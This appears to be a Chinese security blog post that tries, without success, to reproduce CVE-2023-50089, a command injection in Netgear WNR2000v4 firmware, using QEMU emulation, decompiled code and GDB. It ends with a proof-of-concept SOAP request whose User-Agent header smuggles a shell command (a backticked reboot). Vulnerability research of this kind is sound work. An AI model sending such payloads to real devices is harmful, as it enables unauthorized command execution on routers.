NETGEAR-WNR2000命令执行漏洞(CVE-2023-50089)

2023-12-26

1. 前言

刷文章突然刷到了Netgear的新爆出来的命令执行漏洞，打算试试看。不过由于环境问题，命令执行的代码实际上写不进去，也没得解决掉。。。

ps：没复现出来，不过文章里有POC。

2. 实验环境

1
2
3

Ubuntu 20.04
Burp v2021.7
路由器固件：wnr2000v4-V1.0.0.70.zip

固件下载地址

1	https://www.downloads.netgear.com/files/GDC/WNR2000V4/wnr2000v4-V1.0.0.70.zip?_ga=2.61220586.756282065.1703562778-449272902.1703562778

3. 固件模拟

下载下来固件后，是一个.img的文件，直接用binwalk分离就行。

查看文件系统架构，大端序

起一个qemu-mips的虚拟机，然后准备把文件copy进去。

sudo qemu-system-mips -M malta -kernel vmlinux-2.6.32-5-4kc-malta -hda debian_squeeze_mips_standard.qcow2 -append "root=/dev/sda1" -netdev tap,id=tapnet,ifname=tap0,script=no -device rtl8139,netdev=tapnet -nographic

账密是root/root

这里我提前配置好了IP一类的，具体脚本参见之前的blog。这样有个好处就是，模拟出来的mips虚拟机里面会自动获取一个IP，同时这个IP可以和宿主机(Ubuntu)以及物理机互相通信，也可以通外网。

然后将我们的squashfs-root文件复制到mips虚拟机中

1	sudo scp -r squashfs-root root@192.168.7.41:/root/

当然，偶尔也会出现问题，比如下面的报错

这里其实就是因为我每次mips虚拟机的IP都是一样的，导致了我们ssh的文本中，主机标识出了问题。解决方法也很简单，直接把/root/.ssh/known_hosts里面的内容删掉，然后重新copy就行，再复制的时候就很正常了。

成功上传

指定根目录。chroot命令用来在指定的根目录下运行指令。chroot即change root directory(更改root目录)。

1	chroot ./squashfs-root/ /bin/sh

直接运行/usr/sbin/uhttpd文件，虽然会报错，但是服务也起来了。不过好多内容都是400的错误。不清楚漏洞复现不成功是不是和这部分有关系。

访问网站后，后台那边会报如下问题

4. 漏洞利用

根据漏洞描述，当使用HTTP进行SOAP身份验证时，命令执行发生在身份验证成功后的过程中。也就是这个漏洞的利用前提是有账密，能够登陆进后台。

在SOAP认证函数soap_auth中，认证成功的数据包User-Agent会被写入到/tmp/soap_user_agent文件中，从而导致命令注入。Injecton可以通过handle_request -> ExecuteSoapAction -> soap_auth来触发。

soap_auth(){
...
        if ( soap_user_agent )
        {
          sprintf(v18, "echo %s >>/tmp/soap_user_agent", soap_user_agent);
          system(v18);
          return 1;
        }
...
}

当然，上面是官方描述中的内容。我用ida去分析uhttp的时候，估计是反编译的问题吧，实际上有些出入。

4.1 soap_auth函数

uhttp中soap_auth函数内容如下：

int __fastcall soap_auth(_DWORD *a1, int a2, int a3, int a4)
{
  int v8; // $s1
  const char *v9; // $s3
  int v10; // $s2
  int v11; // $v0
  int i; // $s0
  unsigned int v14; // $v0
  int v15; // $v0
  char v16[32]; // [sp+18h] [-340h] BYREF
  char v17[32]; // [sp+38h] [-320h] BYREF
  char v18[256]; // [sp+58h] [-300h] BYREF
  char v19[512]; // [sp+158h] [-200h] BYREF

  arp_mac(a3, v16, v17);
  v8 = sub_435190(v16);
  if ( dword_4B8BD0 )
  {
    strlcpy(v19, dword_4B8BD0, 512);
    v9 = (const char *)strtok(v19, "\n\r");
    v10 = allowed_device(v9, "/tmp/soap_user_agent");
  }
  else
  {
    v10 = 0;
    v9 = 0;
  }
  if ( !v8 || !v10 )
  {
    if ( !strncmp(a4, "Authenticate", 12) )
      goto LABEL_6;
    for ( i = a2; ; --i )
    {
      while ( 1 )
      {
        if ( !i )
          goto LABEL_24;
        if ( a1[18] )
          break;
        v15 = fgetc(a1);
LABEL_23:
        --i;
        if ( v15 == -1 )
          goto LABEL_24;
      }
      v14 = a1[4];
      if ( v14 >= a1[6] )
      {
        v15 = _fgetc_unlocked(a1);
        goto LABEL_23;
      }
      a1[4] = v14 + 1;
    }
  }
  if ( strncmp(a4, "Authenticate", 12) )
  {
    dword_4A74B4 = uptime();
    return 0;
  }
LABEL_6:
  v11 = ParseSoapItems(a1, a2);
  if ( !sub_43538C(v11, a3) )
  {
    dword_4A74B0 = 1;
    if ( v8 )
    {
      if ( !v10 )
        goto LABEL_9;
    }
    else
    {
      sprintf(v18, "echo %s >>/tmp/soap_last_mac", v16);
      system(v18);
      if ( !v10 )
      {
LABEL_9:
        if ( v9 )
        {
          sprintf(v18, (const char *)dword_468E5C, v9);
          system(v18);
          return 1;
        }
        return 1;
      }
    }
    return 1;
  }
  if ( v8 == 1 )
  {
    sprintf(v18, "sed -i '/%s/d' /tmp/soap_last_mac", v16);
    system(v18);
  }
  if ( v10 == 1 )
  {
    sprintf(v18, "sed -i '/%s/d' /tmp/soap_user_agent", v9);
    system(v18);
  }
LABEL_24:
  dword_4A74B0 = 0;
  return -1;
}

复现漏洞的时候发现问题，怎么发包都提示权限不够。一开始以为环境搭建有问题，毕竟搭起来后缺东少西的，切换了user态和system态后发现都是一个状况，提示权限不够。

不过测试发包倒也发出去了

半天没搞明白咋回事，上GDB调试看了眼才发现main函数都没走出去。。。

开个远程调试

1	sudo chroot . ./qemu-mips-static -g 1234 ./usr/sbin/uhttpd

GDB开启，加载端口

1 2	gdb-multiarch ./usr/sbin/uhttpd target remote :1234

给main函数入口处下个断点

成功断在main函数这

一路往下运行，一直到0x4043F4地址

对应反编译代码中的getopt_long函数

跳转到T9对应地址，0x454870处

对应汇编代码如下

运行到0x454878地址，发现开始往0x7f7edbc0跳转，然后就一直循环，出不来了。。。

而且main函数反编译的代码中，还有一个while(1)的死循环，也不知道是不是和这个有关系。

4.2 main函数

main函数反编译代码如下

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v5; // $v0
  int v6; // $s1
  int v7; // $s5
  int v8; // $s7
  int *v9; // $s1
  int *v10; // $s3
  int v11; // $s6
  int *v12; // $v0
  int v13; // $s0
  int v14; // $a0
  int v15; // $s0
  _DWORD *v16; // $s4
  int v17; // $v0
  int result; // $v0
  int v19; // [sp+20h] [-1A0h] BYREF
  int v20; // [sp+24h] [-19Ch] BYREF
  int v21[2]; // [sp+28h] [-198h] BYREF
  __int16 v22; // [sp+30h] [-190h] BYREF
  int v23; // [sp+34h] [-18Ch] BYREF
  char v24; // [sp+40h] [-180h] BYREF
  char v25; // [sp+60h] [-160h] BYREF
  char v26[128]; // [sp+80h] [-140h] BYREF
  int v27; // [sp+100h] [-C0h] BYREF
  int v28; // [sp+104h] [-BCh]
  char v29[136]; // [sp+108h] [-B8h] BYREF
  int v30; // [sp+190h] [-30h]
  int v31; // [sp+194h] [-2Ch]
  int v32; // [sp+198h] [-28h]
  int v33; // [sp+19Ch] [-24h]
  __int16 *v34; // [sp+1A0h] [-20h]
  int *v35; // [sp+1A4h] [-1Ch]
  char *v36; // [sp+1A8h] [-18h]
  char *v37; // [sp+1ACh] [-14h]
  int *v38; // [sp+1B0h] [-10h]
  int *v39; // [sp+1B4h] [-Ch]
  int *v40; // [sp+1B8h] [-8h]

  v39 = &v20;
  while ( 1 )
  {
    v20 = 0;
    v5 = getopt_long(argc, argv, "w:e:c:u:n:h", &off_4806C0, v39);
    if ( v5 == -1 )
      break;
    switch ( v5 )
    {
      case 'c':
        ctl_mod = optarg;
        break;
      case 'e':
        external_detwan_path = optarg;
        break;
      case 'n':
        host_name = optarg;
        break;
      case 'p':
        dword_484F48 = optarg;
        break;
      case 'u':
        upg_mod = optarg;
        break;
      case 'w':
        wan_if_name = optarg;
        break;
      default:
        puts(
          "Usage: uhttpd [OPTIONS]\n"
          "\n"
          "-w  --wan-interface\tWAN Ethernet name\n"
          "-e  --external-detwan\tPath of external Wan Detection Module\n"
          "-p  --plc devices detection help message-------------------\n"
          "-c  --ctl-mod   \tCTL MOD name\n"
          "-u  --upg-mod   \tUPG MOD name\n"
          "-n  --host-name   \tHOST name\n"
          "-h  --help\t\tDisplay this help list");
        exit(0);
        return result;
    }
  }
  if ( !wan_if_name )
    wan_if_name = (int)off_4806B0;
  if ( !ctl_mod )
    ctl_mod = off_4806B4[0];
  if ( !upg_mod )
    upg_mod = off_4806B8[0];
  if ( !host_name )
    host_name = off_4806BC;
  v19 = 16;
  v33 = open_inetsock(4718592);
  dword_484F58 = v33;
  v32 = open_inetsock6();
  dword_484F5C = v32;
  if ( v33 < 0 && v32 < 0 )
  {
    printf("listen_fd = %d, listen_fd6 = %d\n", v33, v32);
    puts("Can't setup the httpd server");
    exit(-1);
  }
  v6 = v33;
  if ( v32 >= v33 )
    v6 = v32;
  reload_language_table();
  init_lang_table();
  puts("The httpd server is running ...");
  daemon(1, 1);
  setenv("PATH", "/sbin:/bin:/usr/sbin:/usr/bin", 1);
  v27 = 0;
  sigemptyset(v29);
  sigaddset(v29, 13);
  sigaddset(v29, 18);
  v28 = 1;
  sigaction(13, &v27, 0);
  v28 = (int)sub_4042D0;
  sigaction(18, &v27, 0);
  v38 = &v19;
  update_auth();
  v31 = v33 & 0x1F;
  set_timezone();
  v30 = v32 & 0x1F;
  firmware_checking();
  v7 = 1 << v30;
  v8 = v6 + 1;
  v9 = &v38[(unsigned int)v33 >> 5];
  v10 = &v38[(unsigned int)v32 >> 5];
  v11 = 1 << v31;
  v34 = &v22;
  v40 = v21;
  v35 = &v23;
  v36 = &v24;
  v37 = &v25;
  while ( 1 )
  {
    do
    {
      v12 = (int *)v26;
      if ( dword_484F64 )
      {
        dword_484F64 = 0;
        while ( waitpid(-1, v39, 1) > 0 )
          ;
        v12 = (int *)v26;
      }
      do
        *v12++ = 0;
      while ( &v27 != v12 );
      v9[24] |= v11;
      v10[24] |= v7;
      sigemptyset(&v27);
      sigaddset(&v27, 18);
      sigprocmask(2, &v27, 0);
      v13 = select(v8, v26, 0, 0, 0);
      sigemptyset(&v27);
      sigaddset(&v27, 18);
      sigprocmask(1, &v27, 0);
    }
    while ( v13 <= 0 );
    if ( (((unsigned int)v9[24] >> v31) & 1) != 0 )
      break;
    if ( (((unsigned int)v10[24] >> v30) & 1) != 0 )
    {
      v14 = v32;
LABEL_26:
      v15 = accept(v14, v34, v38);
      if ( v15 >= 0 )
      {
        v21[0] = 10;
        v21[1] = 0;
        if ( setsockopt(v15, 0xFFFF, 4101, v40, 8) == -1 )
          fcntl(v15, 4, 128);
        if ( setsockopt(v15, 0xFFFF, 4102, v40, 8) == -1 )
          fcntl(v15, 4, 128);
        v16 = (_DWORD *)fdopen(v15, "r+");
        if ( v16 )
        {
          dword_484F60 = (int)v16;
          g_conn_fd = v15;
          init_libconfig();
          if ( v22 == 10 )
          {
            v17 = config_get("lan_ipaddr");
            inet_pton(2, v17, v35);
          }
          if ( !config_match("hijack_process", "3") )
          {
            arp_mac(v23, v36, v37);
            config_set("wan_remote_mac", v36);
          }
          handle_request(v16, v23);
          fflush(v16);
          fclose(v16);
        }
        close(v15);
      }
    }
  }
  v14 = v33;
  goto LABEL_26;
}

也没看明白具体咋回事，反复调试也没搞定这个玩意。流程压根走不到soap_auth函数这个地方。不过POC看起来倒是挺正常的，估摸着还是我环境有些问题。

暂时放弃~~~

5. POC

GET http://192.168.7.39/currentsetting.htm HTTP/1.1
Accept: text/xml
Accept: multipart/*
Accept: application/soap
User-Agent: ";`reboot`;"
Content-Length: 689
Content-Type: text/xml; charset=utf-8
SOAPAction: "urn:NETGEAR-ROUTER:service:ParentalControl:1#Authenticate"

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope 
    soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" 
    xmlns:M1="urn:NETGEAR-ROUTER:service:ParentalControl:1" 
    xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" 
    xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" 
    xmlns:xsd="http://www.w3.org/2001/XMLSchema" 
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <soap:Header>
    <SessionID>16DF8F8B8CBB9B1A1016</SessionID>
  </soap:Header>

  <soap:Body>
    <M1:Authenticate>
      <NewUsername>admin</NewUsername>

      <NewPassword>password</NewPassword>
    </M1:Authenticate>
  </soap:Body>
</soap:Envelope>

6. 参考链接

1 2	WNR2000v4-1.0.0.70 Authorized Command Injection https://github.com/NoneShell/Vulnerabilities/blob/main/NETGEAR/WNR2000v4-1.0.0.70-Authorized-Command-Injection.md

本文作者： foxcookie
发布时间： 2023-12-26
最后更新： 2023-12-29
本文标题： NETGEAR-WNR2000命令执行漏洞(CVE-2023-50089)
本文链接： https://foxcookie.github.io/2023/12/26/NETGEAR-WNR2000命令执行漏洞(CVE-2023-50089)/
版权声明： 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明出处！